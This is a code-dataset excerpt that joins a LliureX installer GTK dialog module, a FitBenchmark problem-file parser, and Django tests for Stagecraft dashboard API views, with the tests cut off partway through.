server?\\n'%s'\")%pkg_name)\n\t\tresponse=dialog.run()\n\t\tdialog.destroy()\n\t\t\n\t\tif response== Gtk.ResponseType.OK:\n\t\t\treturn True\n\t\t\n\t\treturn False\n\t\t\n\t#def remove_file_dialog\n\t\n\tdef remove_file_info_dialog(self,comment):\n\t\t\n\t\tmain_window=self.core.lri.main_window\n\t\tdialog=Dialog.ErrorDialog(main_window,_(\"Delete package\"),comment)\n\t\tresponse=dialog.run()\n\t\tdialog.destroy()\n\t\t\t\t\n\t\treturn True\n\t\t\n\t#def remove_file_info_dialog\n\t\n\tdef send_file_dialog(self,pkg_name):\n\t\t\n\t\tmain_window=self.core.lri.main_window\n\t\tdialog=Dialog.QuestionDialog(main_window,_(\"DEB not in Server\"),_(\"Do you want to send to the server this DEB '%s' ?\")%pkg_name)\n\t\tresponse=dialog.run()\n\t\tdialog.destroy()\n\t\t\n\t\tif response== Gtk.ResponseType.OK:\n\t\t\treturn True\n\t\t\n\t\treturn False\n\t\t\n\t#def delete_package_dialog\n\t\n\tdef send_list_dialog(self,pkg_name_orig):\n\t\tmain_window=self.core.lri.main_window\n\t\tpkg_name='\\n'.join(pkg_name_orig)\n\t\tdialog=Dialog.QuestionDialog(main_window,_(\"DEB not in Server\"),_(\"Do you want to send to the server this DEB list?\\n%s\\n\")%pkg_name)\n\t\tresponse=dialog.run()\n\t\tdialog.destroy()\n\t\t\n\t\tif response== Gtk.ResponseType.OK:\n\t\t\treturn True\n\t\t\n\t\treturn False\n\t\t\n\t#def send_list_dialog\n\t\n\t\n\tdef changes_detected_dialog(self,force_exit=False):\n\t\t\n\t\tmain_window=self.core.lri.main_window\n\t\t\n\t\tdialog=Dialog.QuestionDialog(main_window,_(\"Changes detected\"),_(\"There are unsaved changes. Do you want to discard them?\"))\n\t\tresponse=dialog.run()\n\t\tdialog.destroy()\n\t\t\n\t\tif response== Gtk.ResponseType.OK:\n\t\t\tif force_exit:\n\t\t\t\tsys.exit(0)\n\t\t\t\t\n\t\t\treturn True\n\t\t\n\t\treturn False\n\t\t\n\t#def changes_detected_dialog\n\t\n\t\n\t\n\tdef delete_test_deb_dialog(self,pkg_name_orig):\n\t\t\n\t\tmain_window=self.core.lri.main_window\n\t\tpkg_name='\\n'.join(pkg_name_orig)\n\t\tdialog=Dialog.QuestionDialog(main_window,_(\"Delete deb list\"),_(\"This DEB list is unavaiable from your server:\\n%s\\nDo you want delete it?\")%pkg_name)\n\t\tresponse=dialog.run()\n\t\tdialog.destroy()\n\t\t\n\t\tif response== Gtk.ResponseType.OK:\n\t\t\treturn True\n\t\t\n\t\treturn False\n\t\t\n\t#def delete_package_dialog\n\t\n\t\n#class debbox\n", "sub_path": "lliurex-remote-installer-gui.install/usr/share/lliurex-remote-installer/DebBox.py", "file_name": "DebBox.py", "file_ext": "py", "file_size_in_byte": 13682, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "gi.require_version", "line_number": 2, "usage_type": "call"}, {"api_name": "gettext.textdomain", "line_number": 15, "usage_type": "call"}, {"api_name": "gettext.gettext", "line_number": 16, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk.VBox", "line_number": 22, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 22, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.VBox.__init__", "line_number": 27, "usage_type": "call"}, {"api_name": "gi.repository.Gtk.VBox", "line_number": 27, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 27, "usage_type": "name"}, {"api_name": "Core.Core.get_core", "line_number": 29, "usage_type": "call"}, {"api_name": "Core.Core", "line_number": 29, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk.Builder", "line_number": 31, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 31, "usage_type": "name"}, {"api_name": "threading.Thread", "line_number": 53, "usage_type": "call"}, {"api_name": "gi.repository.Gtk.CssProvider", "line_number": 63, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 63, "usage_type": "name"}, {"api_name": "gi.repository.Gio.File.new_for_path", "line_number": 64, "usage_type": "call"}, {"api_name": "gi.repository.Gio.File", "line_number": 64, "usage_type": "attribute"}, {"api_name": "gi.repository.Gio", "line_number": 64, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.StyleContext.add_provider_for_screen", "line_number": 66, "usage_type": "call"}, {"api_name": "gi.repository.Gtk.StyleContext", "line_number": 66, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 66, "usage_type": "name"}, {"api_name": "gi.repository.Gdk.Screen.get_default", "line_number": 66, "usage_type": "call"}, {"api_name": "gi.repository.Gdk.Screen", "line_number": 66, "usage_type": "attribute"}, {"api_name": "gi.repository.Gdk", "line_number": 66, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.STYLE_PROVIDER_PRIORITY_APPLICATION", "line_number": 66, "usage_type": "attribute"}, {"api_name": "copy.deepcopy", "line_number": 80, "usage_type": "call"}, {"api_name": "os.path.expanduser", "line_number": 114, "usage_type": "call"}, {"api_name": "os.path", "line_number": 114, "usage_type": "attribute"}, {"api_name": "os.path.expanduser", "line_number": 118, "usage_type": "call"}, {"api_name": "os.path", "line_number": 118, "usage_type": "attribute"}, {"api_name": "Dialog.FileDialog", "line_number": 140, "usage_type": "call"}, {"api_name": "gi.repository.Gtk.ResponseType", "line_number": 145, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 145, "usage_type": "name"}, {"api_name": "os.path.basename", "line_number": 148, "usage_type": "call"}, {"api_name": "os.path", "line_number": 148, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 149, "usage_type": "call"}, {"api_name": "os.path", "line_number": 149, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 200, "usage_type": "call"}, {"api_name": "gi.repository.Gtk.HBox", "line_number": 210, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 210, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Label", "line_number": 211, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 211, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Button", "line_number": 212, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 212, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Image.new_from_file", "line_number": 213, "usage_type": "call"}, {"api_name": "gi.repository.Gtk.Image", "line_number": 213, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 213, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Align", "line_number": 215, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 215, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Align", "line_number": 216, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 216, "usage_type": "name"}, {"api_name": "threading.Thread", "line_number": 253, "usage_type": "call"}, {"api_name": "Dialog.ApplyingChangesDialog", "line_number": 258, "usage_type": "call"}, {"api_name": "gi.repository.GLib.timeout_add", "line_number": 260, "usage_type": "call"}, {"api_name": "gi.repository.GLib", "line_number": 260, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 299, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 310, "usage_type": "call"}, {"api_name": "Dialog.ApplyingChangesDialog", "line_number": 322, "usage_type": "call"}, {"api_name": "gi.repository.GLib.timeout_add", "line_number": 324, "usage_type": "call"}, {"api_name": "gi.repository.GLib", "line_number": 324, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 353, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 377, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 378, "usage_type": "call"}, {"api_name": "Dialog.ErrorDialog", "line_number": 394, "usage_type": "call"}, {"api_name": "Dialog.ErrorDialog", "line_number": 412, "usage_type": "call"}, {"api_name": "Dialog.ErrorDialog", "line_number": 425, "usage_type": "call"}, {"api_name": "Dialog.QuestionDialog", "line_number": 438, "usage_type": "call"}, {"api_name": "gi.repository.Gtk.ResponseType", "line_number": 442, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 442, "usage_type": "name"}, {"api_name": "Dialog.QuestionDialog", "line_number": 452, "usage_type": "call"}, {"api_name": "gi.repository.Gtk.ResponseType", "line_number": 456, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 456, "usage_type": "name"}, {"api_name": "Dialog.ErrorDialog", "line_number": 466, "usage_type": "call"}, {"api_name": "Dialog.QuestionDialog", "line_number": 477, "usage_type": "call"}, {"api_name": "gi.repository.Gtk.ResponseType", "line_number": 481, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 481, "usage_type": "name"}, {"api_name": "Dialog.QuestionDialog", "line_number": 491, "usage_type": "call"}, {"api_name": "gi.repository.Gtk.ResponseType", "line_number": 495, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 495, "usage_type": "name"}, {"api_name": "Dialog.QuestionDialog", "line_number": 507, "usage_type": "call"}, {"api_name": "gi.repository.Gtk.ResponseType", "line_number": 511, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 511, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 513, "usage_type": "call"}, {"api_name": "Dialog.QuestionDialog", "line_number": 527, "usage_type": "call"}, {"api_name": "gi.repository.Gtk.ResponseType", "line_number": 531, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 531, "usage_type": "name"}]} +{"seq_id": "93513365", "text": "\"\"\"\nThis file implements a parser for the Fitbenchmark data format.\n\"\"\"\n\nfrom __future__ import (absolute_import, division, print_function)\n\nfrom collections import OrderedDict\nimport mantid.simpleapi as msapi\nimport numpy as np\nimport os\n\nfrom fitbenchmarking.parsing.base_parser import Parser\nfrom fitbenchmarking.parsing.fitting_problem import FittingProblem\nfrom fitbenchmarking.utils.logging_setup import logger\n\n\nclass FitbenchmarkParser(Parser):\n \"\"\"\n Parser for the native FitBenchmarking problem definition (FitBenchmark)\n file.\n \"\"\"\n\n def parse(self):\n \"\"\"\n Parse the Fitbenchmark problem file into a Fitting Problem.\n\n :return: The fully parsed fitting problem\n :rtype: fitbenchmarking.parsing.fitting_problem.FittingProblem\n \"\"\"\n fitting_problem = FittingProblem()\n\n self._entries = self._get_fitbenchmark_data_problem_entries()\n self._parsed_func = self._parse_function()\n\n fitting_problem.name = self._entries['name']\n\n data_points = self._get_data_points()\n\n fitting_problem.data_x = data_points[:, 0]\n fitting_problem.data_y = data_points[:, 1]\n if data_points.shape[1] > 2:\n fitting_problem.data_e = data_points[:, 2]\n\n # String containing the function name(s) and the starting parameter\n # values for each function\n self._mantid_equation = self._entries['function']\n\n fitting_problem.functions = self._fitbenchmark_func_definitions()\n\n # Print number of equations until better way of doing this is looked at\n equation_count = len(self._parsed_func)\n fitting_problem.equation = '{} Functions'.format(equation_count)\n\n fitting_problem.starting_values = self._get_starting_values()\n\n # start and end values in x range\n if 'fit_parameters' in self._entries:\n start_x, end_x = self._get_x_range()\n fitting_problem.start_x = start_x\n fitting_problem.end_x = end_x\n\n return fitting_problem\n\n def _get_data_file(self):\n \"\"\"\n Find/create the (full) path to a data_file specified in a FitBenchmark\n definition file, where the data_file is searched for in the directory\n of the definition file and subfolders of this file\n\n :returns: (full) path to a data file. Return None if not found\n :rtype: str or None\n \"\"\"\n data_file = None\n data_file_name = self._entries['input_file']\n # find or search for path for data_file_name\n for root, _, files in os.walk(os.path.dirname(self._filename)):\n for name in files:\n if data_file_name == name:\n data_file = os.path.join(root, data_file_name)\n\n if data_file is None:\n logger.error(\"Data file %s not found\", data_file_name)\n\n return data_file\n\n def _get_fitbenchmark_data_problem_entries(self):\n \"\"\"\n Get the problem entries from a fitbenchmark problem definition\n file.\n\n :returns: The entries from the file with string values\n :rtype: dict\n \"\"\"\n\n entries = {}\n for line in self.file.readlines():\n # Discard comments\n line = line.split('#', 1)[0]\n if line.strip() == '':\n continue\n\n lhs, rhs = line.split(\"=\", 1)\n entries[lhs.strip()] = rhs.strip().strip('\"').strip(\"'\")\n\n return entries\n\n def _parse_function(self):\n \"\"\"\n Get the params from the function as a list of dicts from the data\n file.\n\n :return: Function definition in format:\n [{name1: value1, name2: value2, ...}, ...]\n :rtype: list of dict\n \"\"\"\n function_def = []\n\n functions = self._entries['function'].split(';')\n\n for f in functions:\n params_dict = OrderedDict()\n # To handle brackets, must split on comma or split after an\n # opening backet\n tmp_params_list = f.split(',')\n if '(' in f:\n params_list = []\n for p in tmp_params_list:\n if '(' in p:\n vals = [v+'(' for v in p.split('(', 1)]\n vals[-1] = vals[-1][:-1]\n params_list.extend(vals)\n else:\n params_list.append(p)\n else:\n params_list = tmp_params_list\n\n pop_stack = False\n stack = [params_dict]\n for p in params_list:\n name, val = p.split('=', 1)\n name = name.strip()\n val = val.strip()\n\n if val == '(':\n val = OrderedDict()\n stack[-1][name] = val\n stack += [val]\n continue\n\n elif val[-1] == ')':\n pop_stack = val.count(')')\n if len(stack) <= pop_stack:\n raise ValueError('Could not parse.'\n + 'Check parentheses in input')\n val = val.strip(')')\n\n # Parse to an int/float if possible else assume string\n tmp_val = None\n for t in [int, float]:\n if tmp_val is None:\n try:\n tmp_val = t(val)\n except ValueError:\n pass\n\n if tmp_val is not None:\n val = tmp_val\n\n stack[-1][name] = val\n\n if pop_stack > 0:\n stack = stack[:-pop_stack]\n pop_stack = 0\n\n function_def.append(params_dict)\n\n return function_def\n\n def _get_data_points(self):\n \"\"\"\n Get the data points of the problem from the data file.\n\n :return: data points\n :rtype: np.ndarray\n \"\"\"\n\n data_file_path = self._get_data_file()\n\n with open(data_file_path, 'r') as f:\n data_text = f.readlines()\n\n first_row = data_text[2].strip()\n dim = len(first_row.split())\n data_points = np.zeros((len(data_text)-2, dim))\n\n for idx, line in enumerate(data_text[2:]):\n point_text = line.split()\n point = [float(val) for val in point_text]\n data_points[idx, :] = point\n\n return data_points\n\n def _get_starting_values(self):\n \"\"\"\n Get the starting values for the problem\n\n :returns: Starting values for the function\n :rtype: list\n \"\"\"\n ignore = ['name', 'BinWidth', 'ties']\n\n starting_values = [['f{}_{}'.format(i, name), [f[name]]]\n for i, f in enumerate(self._parsed_func)\n for name in f.keys()\n if name not in ignore]\n\n return starting_values\n\n def _get_x_range(self):\n \"\"\"\n Get the x ranges for the problem\n\n :returns: start_x and end_x\n :rtype: float, float\n \"\"\"\n fit_params_str = self._entries['fit_parameters'].strip('{').strip('}')\n fit_params = fit_params_str.split(',')\n for f in fit_params:\n name, val = f.split(':')\n name = name.strip().strip('\"').strip(\"'\")\n if name not in ['StartX', 'EndX']:\n continue\n\n try:\n val = float(val.strip())\n except ValueError:\n raise ValueError('Could not parse fit_parameter: {}'.format(f))\n\n if name == 'StartX':\n start_x = val\n else:\n end_x = val\n\n return start_x, end_x\n\n def _fitbenchmark_func_definitions(self):\n \"\"\"\n Processing the function in the FitBenchmark problem definition into a\n python callable.\n\n :returns: A function definition array of one element which contains a\n callable Mantid function and the function parameter values.\n :rtype: list\n \"\"\"\n fit_function = None\n param_vals = []\n\n for f in self._parsed_func:\n name = f['name']\n params = f.copy()\n for key in ['name', 'BinWidth', 'ties']:\n if key in params:\n params.pop(key)\n param_vals.extend(params.values())\n tmp_function = msapi.__dict__[name](**params)\n if fit_function is None:\n fit_function = tmp_function\n else:\n fit_function += tmp_function\n\n for i, f in enumerate(self._parsed_func):\n if 'ties' in f:\n ties = {'f{}.{}'.format(i, tie): val\n for tie, val in f['ties'].items()}\n fit_function.tie(ties)\n\n function_def = [[fit_function, param_vals]]\n\n return function_def\n", "sub_path": "fitbenchmarking/parsing/fitbenchmark_parser.py", "file_name": "fitbenchmark_parser.py", "file_ext": "py", "file_size_in_byte": 8914, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "fitbenchmarking.parsing.base_parser.Parser", "line_number": 17, "usage_type": "name"}, {"api_name": "fitbenchmarking.parsing.fitting_problem.FittingProblem", "line_number": 30, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 76, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 76, "usage_type": "call"}, {"api_name": "os.path", "line_number": 76, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 79, "usage_type": "call"}, {"api_name": "os.path", "line_number": 79, "usage_type": "attribute"}, {"api_name": "fitbenchmarking.utils.logging_setup.logger.error", "line_number": 82, "usage_type": "call"}, {"api_name": "fitbenchmarking.utils.logging_setup.logger", "line_number": 82, "usage_type": "name"}, {"api_name": "collections.OrderedDict", "line_number": 121, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 194, "usage_type": "call"}, {"api_name": "mantid.simpleapi.__dict__", "line_number": 265, "usage_type": "attribute"}, {"api_name": "mantid.simpleapi", "line_number": 265, "usage_type": "name"}]} +{"seq_id": "441282276", "text": "from __future__ import unicode_literals\nimport json\n\nfrom django.test import TestCase\nfrom hamcrest import (\n assert_that, equal_to, is_, none, has_property,\n contains, has_entry, has_entries\n)\nfrom django_nose.tools import assert_redirects\nfrom mock import patch\n\nfrom stagecraft.apps.dashboards.tests.factories.factories import(\n DashboardFactory, DepartmentFactory, ModuleTypeFactory, ModuleFactory)\nfrom stagecraft.apps.dashboards.models.dashboard import (\n Dashboard)\nfrom stagecraft.apps.dashboards.views.dashboard import(\n recursively_fetch_dashboard)\nfrom stagecraft.libs.authorization.tests.test_http import (\n with_govuk_signon)\nfrom stagecraft.libs.views.utils import to_json\nfrom stagecraft.libs.views.utils import JsonEncoder\n\n\nclass DashboardViewsListTestCase(TestCase):\n\n @patch(\n \"stagecraft.apps.dashboards.models.\"\n \"dashboard.Dashboard.list_for_spotlight\")\n def test_get_dashboards_without_slug_returns_minimal_dashboards_json(\n self,\n patch_list_for_spotlight):\n returned_data = [\n {'i am in a list': 'this is a list'},\n {'more things in a list': 'yes'}]\n patch_list_for_spotlight.return_value = returned_data\n resp = self.client.get(\n '/public/dashboards', {})\n assert_that(resp.status_code, equal_to(200))\n assert_that(\n len(json.loads(resp.content)),\n equal_to(2)\n )\n assert_that(\n json.loads(resp.content)[0],\n has_entries(returned_data[0])\n )\n assert_that(\n json.loads(resp.content)[1],\n has_entries(returned_data[1])\n )\n\n def test_get_dashboards_with_slug_query_param_returns_dashboard_json(self):\n DashboardFactory(slug='my_first_slug')\n resp = self.client.get(\n '/public/dashboards', {'slug': 'my_first_slug'})\n assert_that(json.loads(resp.content), has_entry('slug',\n 'my_first_slug'))\n assert_that(resp['Cache-Control'], equal_to('max-age=300'))\n\n def test_get_dashboards_only_caches_when_published(self):\n DashboardFactory(slug='published_dashboard')\n DashboardFactory(slug='unpublished_dashboard', published=False)\n\n resp = self.client.get(\n '/public/dashboards', {'slug': 'published_dashboard'})\n assert_that(resp['Cache-Control'], equal_to('max-age=300'))\n\n resp = self.client.get(\n '/public/dashboards', {'slug': 'unpublished_dashboard'})\n assert_that(resp['Cache-Control'], equal_to('no-cache'))\n\n @patch(\n 'stagecraft.apps.dashboards.models.dashboard.Dashboard.spotlightify')\n def test_get_dashboards_with_slug_query_param_returns_404_if_no_dashboard(\n self,\n spotlightify_patch):\n resp = self.client.get(\n '/public/dashboards', {'slug': 'my_first_slug'})\n assert_that(json.loads(resp.content), equal_to(\n {\n u'status': u'error',\n u'message': u\"No dashboard with slug 'my_first_slug' exists\"}))\n assert_that(resp.status_code, equal_to(404))\n\n def test_recursively_fetch_dashboard_recurses_down_the_slug_fragments(\n self):\n dashboard = DashboardFactory(slug='experimental/my_first_slug')\n slug = 'experimental/my_first_slug/another/thing'\n returned_dashboard = recursively_fetch_dashboard(slug)\n assert_that(dashboard.id, equal_to(returned_dashboard.id))\n\n def test_recursively_fetch_dashboard_returns_none_after_3_levels(\n self):\n DashboardFactory(slug='my_first_slug')\n slug = 'my_first_slug/some_url_fragment/another/another'\n returned_dashboard = recursively_fetch_dashboard(slug)\n assert_that(returned_dashboard, is_(none()))\n\n @patch(\n 'stagecraft.apps.dashboards.models.dashboard.Dashboard.spotlightify'\n )\n def test_public_dashboards_with_forward_slash_redirects(\n self,\n spotlightify_patch):\n resp = self.client.get(\n '/public/dashboards/', {'slug': 'my_first_slug'})\n assert_redirects(\n resp,\n 'http://testserver/public/dashboards?slug=my_first_slug',\n status_code=301,\n target_status_code=404)\n\n def test_modules_are_ordered_correctly(self):\n dashboard = DashboardFactory(slug='my-first-slug')\n module_type = ModuleTypeFactory()\n ModuleFactory(\n type=module_type, dashboard=dashboard,\n order=2, slug='slug2')\n ModuleFactory(\n type=module_type, dashboard=dashboard,\n order=1, slug='slug1')\n ModuleFactory(\n type=module_type, dashboard=dashboard,\n order=3, slug='slug3')\n\n resp = self.client.get(\n '/public/dashboards', {'slug': 'my-first-slug'})\n\n data = json.loads(resp.content)\n assert_that(data['modules'],\n contains(\n has_entry('slug', 'slug1'),\n has_entry('slug', 'slug2'),\n has_entry('slug', 'slug3')))\n\n def test_dashboard_with_module_slug_only_returns_module(self):\n dashboard = DashboardFactory(slug='my-first-slug')\n module_type = ModuleTypeFactory()\n ModuleFactory(\n type=module_type, dashboard=dashboard,\n slug='module-we-want')\n ModuleFactory(\n type=module_type, dashboard=dashboard,\n slug='module-we-dont-want')\n resp = self.client.get(\n '/public/dashboards', {'slug': 'my-first-slug/module-we-want'})\n data = json.loads(resp.content)\n assert_that(data['modules'],\n contains(has_entry('slug', 'module-we-want')))\n assert_that(data, has_entry('page-type', 'module'))\n\n def test_dashboard_with_non_existing_module_slug_returns_nothing(self):\n dashboard = DashboardFactory(slug='my-first-slug')\n module_type = ModuleTypeFactory()\n ModuleFactory(\n type=module_type, dashboard=dashboard,\n slug='module-we-want')\n resp = self.client.get(\n '/public/dashboards', {'slug': 'my-first-slug/nonexisting-module'})\n data = json.loads(resp.content)\n assert_that(data, has_entry('status', 'error'))\n\n def test_dashboard_with_tab_slug_only_returns_tab(self):\n dashboard = DashboardFactory(slug='my-first-slug')\n module_type = ModuleTypeFactory()\n ModuleFactory(\n type=module_type, dashboard=dashboard,\n slug='module-we-want',\n info=['module-info'],\n title='module-title',\n options={\n 'tabs': [\n {\n 'slug': 'tab-we-want',\n 'title': 'tab-title'\n },\n {\n 'slug': 'tab-we-dont-want',\n }\n ]\n })\n ModuleFactory(\n type=module_type, dashboard=dashboard,\n slug='module-we-dont-want')\n resp = self.client.get(\n '/public/dashboards',\n {'slug': 'my-first-slug/module-we-want/module-we-want-tab-we-want'}\n )\n data = json.loads(resp.content)\n assert_that(data['modules'],\n contains(\n has_entries({'slug': 'tab-we-want',\n 'info': contains('module-info'),\n 'title': 'module-title - tab-title'\n })))\n assert_that(data, has_entry('page-type', 'module'))\n\n def test_dashboard_with_nonexistent_tab_slug_returns_nothing(self):\n dashboard = DashboardFactory(slug='my-first-slug')\n module_type = ModuleTypeFactory()\n ModuleFactory(\n type=module_type, dashboard=dashboard,\n slug='module',\n info=['module-info'],\n title='module-title',\n options={\n 'tabs': [\n {\n 'slug': 'tab-we-want',\n 'title': 'tab-title'\n },\n {\n 'slug': 'tab-we-dont-want',\n }\n ]\n })\n ModuleFactory(\n type=module_type, dashboard=dashboard,\n slug='module-we-dont-want')\n resp = self.client.get(\n '/public/dashboards',\n {'slug': 'my-first-slug/module/module-non-existent-tab'}\n )\n data = json.loads(resp.content)\n assert_that(data, has_entry('status', 'error'))\n\n\nclass DashboardViewsGetTestCase(TestCase):\n\n @with_govuk_signon(permissions=['dashboard'])\n def test_get_a_dashboard_with_incorrect_id_or_no_id_returns_404(self):\n resp = self.client.get(\n '/dashboard/', HTTP_AUTHORIZATION='Bearer correct-token'\n )\n second_response = self.client.get(\n '/dashboard/non-existant-m8',\n HTTP_AUTHORIZATION='Bearer correct-token'\n )\n\n assert_that(resp.status_code, equal_to(404))\n assert_that(second_response.status_code, equal_to(404))\n\n @with_govuk_signon(permissions=['dashboard'])\n def test_get_an_existing_dashboard_returns_a_dashboard(self):\n dashboard = DashboardFactory()\n\n resp = self.client.get(\n '/dashboard/{}'.format(dashboard.id),\n HTTP_AUTHORIZATION='Bearer correct-token')\n\n assert_that(resp.status_code, equal_to(200))\n assert_that(\n json.loads(resp.content),\n has_entries(\n {\n \"description_extra\": \"\",\n \"strapline\": \"Dashboard\",\n \"description\": \"\",\n \"links\": [],\n \"title\": \"title\",\n \"tagline\": \"\",\n \"organisation\": None,\n \"modules\": [],\n \"dashboard_type\": \"transaction\",\n \"slug\": \"slug1\",\n \"improve_dashboard_message\": True,\n \"customer_type\": \"\",\n \"costs\": \"\",\n \"page_type\": \"dashboard\",\n \"published\": True,\n \"business_model\": \"\",\n \"other_notes\": \"\"\n }\n )\n )\n\n\nclass DashboardViewsUpdateTestCase(TestCase):\n\n @with_govuk_signon(permissions=['dashboard'])\n def test_change_title_of_dashboard_changes_title_of_dashboard(self):\n dashboard = DashboardFactory()\n dashboard_data = dashboard.serialize()\n\n dashboard_data['title'] = 'foo'\n\n resp = self.client.put(\n '/dashboard/{}'.format(dashboard.id),\n json.dumps(dashboard_data, cls=JsonEncoder),\n content_type=\"application/json\",\n HTTP_AUTHORIZATION='Bearer correct-token')\n\n assert_that(resp.status_code, equal_to(200))\n assert_that(\n Dashboard.objects.get(id=dashboard.id).title, equal_to('foo')\n )\n\n @with_govuk_signon(permissions=['dashboard'])\n def test_putting_to_nonexistant_dashboard_returns_404(self):\n dashboard = DashboardFactory()\n dashboard_data = dashboard.serialize()\n\n resp = self.client.put(\n '/dashboard/nonsense',\n json.dumps(dashboard_data, cls=JsonEncoder),\n content_type=\"application/json\",\n HTTP_AUTHORIZATION='Bearer correct-token')\n\n assert_that(resp.status_code, equal_to(404))\n\n\nclass DashboardViewsCreateTestCase(TestCase):\n\n def _get_dashboard_payload(self, **kwargs):\n data = {\n \"slug\": \"foo\",\n \"dashboard-type\": \"transaction\",\n \"page-type\": \"dashboard\",\n \"published\": True,\n \"title\": \"Foo dashboard\",\n \"description\": \"This is a foo\",\n \"description-extra\": \"This is some extra\",\n \"costs\": \"eh?\",\n \"other-notes\": \"some other notes\",\n \"customer-type\": \"Business\",\n \"business-model\": \"Department budget\",\n \"improve-dashboard-message\": True,\n \"strapline\": \"Dashboard\",\n \"tagline\": \"This is the tagline\",\n \"organisation\": None,\n \"links\": [\n {\n \"title\": \"External link\",\n \"url\": \"https://www.gov.uk/\",\n \"type\": \"transaction\",\n }\n ],\n }\n for k, v in kwargs.iteritems():\n data[k.replace('_', '-')] = v\n\n return data\n\n @with_govuk_signon(permissions=['dashboard'])\n def test_create_dashboard_with_organisation(self):\n department = DepartmentFactory()\n data = self._get_dashboard_payload(\n organisation='{}'.format(department.id))\n\n resp = self.client.post(\n '/dashboard', json.dumps(data),\n content_type=\"application/json\",\n HTTP_AUTHORIZATION='Bearer correct-token')\n\n assert_that(resp.status_code, equal_to(200))\n assert_that(Dashboard.objects.count(), equal_to(1))\n\n @with_govuk_signon(permissions=['dashboard'])\n def test_create_dashboard_fails_with_invalid_organisation_uuid(self):\n data = self._get_dashboard_payload(organisation='invalid')\n\n resp = self.client.post(\n '/dashboard', json.dumps(data),\n content_type=\"application/json\",\n HTTP_AUTHORIZATION='Bearer correct-token')\n\n assert_that(resp.status_code, equal_to(400))\n assert_that(Dashboard.objects.count(), equal_to(0))\n\n @with_govuk_signon(permissions=['dashboard'])\n def test_create_dashboard_fails_with_non_existent_organisation(self):\n data = self._get_dashboard_payload(\n organisation='7969dcd9-7e9e-4cab-a352-424d57724523')\n\n resp = self.client.post(\n '/dashboard', json.dumps(data),\n content_type=\"application/json\",\n HTTP_AUTHORIZATION='Bearer correct-token')\n\n assert_that(resp.status_code, equal_to(400))\n assert_that(Dashboard.objects.count(), equal_to(0))\n\n @with_govuk_signon(permissions=['dashboard'])\n def test_create_dashboard_ok_with_no_organisation(self):\n data = self._get_dashboard_payload(\n organisation=None)\n\n resp = self.client.post(\n '/dashboard', json.dumps(data),\n content_type=\"application/json\",\n HTTP_AUTHORIZATION='Bearer correct-token')\n\n assert_that(resp.status_code, equal_to(200))\n assert_that(Dashboard.objects.count(), equal_to(1))\n\n @with_govuk_signon(permissions=['dashboard'])\n def test_create_dashboard_ok_with_links(self):\n data = self._get_dashboard_payload()\n\n resp = self.client.post(\n '/dashboard', json.dumps(data),\n content_type=\"application/json\",\n HTTP_AUTHORIZATION='Bearer correct-token')\n\n dashboard = Dashboard.objects.first()\n\n assert_that(resp.status_code, equal_to(200))\n assert_that(dashboard.link_set.count(), equal_to(1))\n assert_that(dashboard.link_set.all(),\n contains(has_property('title',\n equal_to('External link'))))\n\n @with_govuk_signon(permissions=['dashboard'])\n def test_create_dashboard_ok_with_modules(self):\n module_type = ModuleTypeFactory()\n\n def make_module(slug, title, order):\n return {\n 'slug': slug,\n 'title': title,\n 'type_id': module_type.id,\n 'description': 'a description',\n 'info': [],\n 'options': {},\n 'order': order,\n }\n\n data = self._get_dashboard_payload()\n data['modules'] = [\n make_module('foo', 'The Foo', 1),\n make_module('bar', 'The Bar', 3),\n make_module('monkey', 'The the', 2),\n ]\n\n resp = self.client.post(\n '/dashboard', to_json(data),\n content_type=\"application/json\",\n HTTP_AUTHORIZATION='Bearer correct-token')\n\n assert_that(resp.status_code, equal_to(200))\n dashboard = Dashboard.objects.first()\n assert_that(dashboard.module_set.count(), equal_to(3))\n\n @with_govuk_signon(permissions=['dashboard'])\n def test_create_dashboard_fails_with_invalid_module(self):\n module_type = ModuleTypeFactory()\n module = {\n 'slug': 'bad slug',\n 'title': 'bad slug',\n 